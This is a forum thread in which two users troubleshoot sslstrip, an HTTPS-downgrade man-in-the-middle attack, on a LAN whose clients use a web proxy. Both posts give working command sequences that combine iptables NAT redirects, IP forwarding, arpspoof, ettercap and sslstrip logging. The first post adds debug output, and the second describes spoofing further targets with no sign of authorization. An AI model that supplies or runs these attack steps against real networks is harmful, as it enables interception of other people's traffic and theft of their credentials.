Results 1 to 2 of 2

Thread: sslstrip behind a proxy server

  1. #1
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    1

    Default sslstrip behind a proxy server

    sslstrip is failing when used in a proxy environment. For example, all the clients on LAN use someserver:8080 as their web proxy. I'm starting sslstrip with the following commands:

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo "1" > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 [gateway ip]
    sslstrip -w debug.log -k -p -l 10000
    Clients hang when trying to use SSL websites. The debug log contains repetitions of:

    2010-02-04 14:55:47,663 Sending request via HTTP...
    2010-02-04 14:55:47,670 Server connection failed.
    2010-02-04 14:55:47,670 Retrying via SSL
    2010-02-04 14:55:47,674 Server connection failed.
    2010-02-04 14:55:47,678 Sending request via HTTP...
    2010-02-04 14:55:47,723 Server connection failed.
    2010-02-04 14:55:47,723 Retrying via SSL
    2010-02-04 14:55:47,729 Server connection failed.
    2010-02-04 14:55:47,732 Sending request via HTTP...
    2010-02-04 14:55:47,735 Server connection failed.
    2010-02-04 14:55:47,735 Retrying via SSL
    2010-02-04 14:55:47,814 Sending request via HTTP...
    2010-02-04 14:55:47,899 Sending request via HTTP...
    2010-02-04 14:55:47,955 Sending request via HTTP...
    2010-02-04 14:55:47,964 Sending request via HTTP...
    2010-02-04 14:55:47,974 Sending request via HTTP...
    2010-02-04 14:55:48,047 Sending request via HTTP...
    2010-02-04 14:55:48,059 Sending request via HTTP...
    2010-02-04 14:55:48,062 Server connection failed.
    2010-02-04 14:55:48,062 Retrying via SSL
    2010-02-04 14:55:50,218 Sending request via HTTP...
    Any ideas what might solve this issue?

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    3

    Default

    man , i have the same situation my network is using a proxy server

    and im doing that sslstrip and it works fine for me

    when using ettercap

    e
    cho 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port 10000
    "why are using iptables two times i think u r enabling it once then disabling it , i dunn know but i think so "

    arpspoof -i eth0 [target][gateway ip]
    ettercap -T -q -i eth0
    sslstrip -w debug.log -k -p -l 10000
    that order will work fine
    but im facing another problem and that is
    when i stop ettercap and arp for spoofing another target
    it doesnt work , and (the proxy server not found) message appears on the traget IE
    but i noticed when repeating "echo 1 > /proc/sys/net/ipv4/ip_forward"
    many time it then work
    but i dunn know how many times i have to do so
    it always differ...
    so plz im requesting u guys help if u can
    thnxxx

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •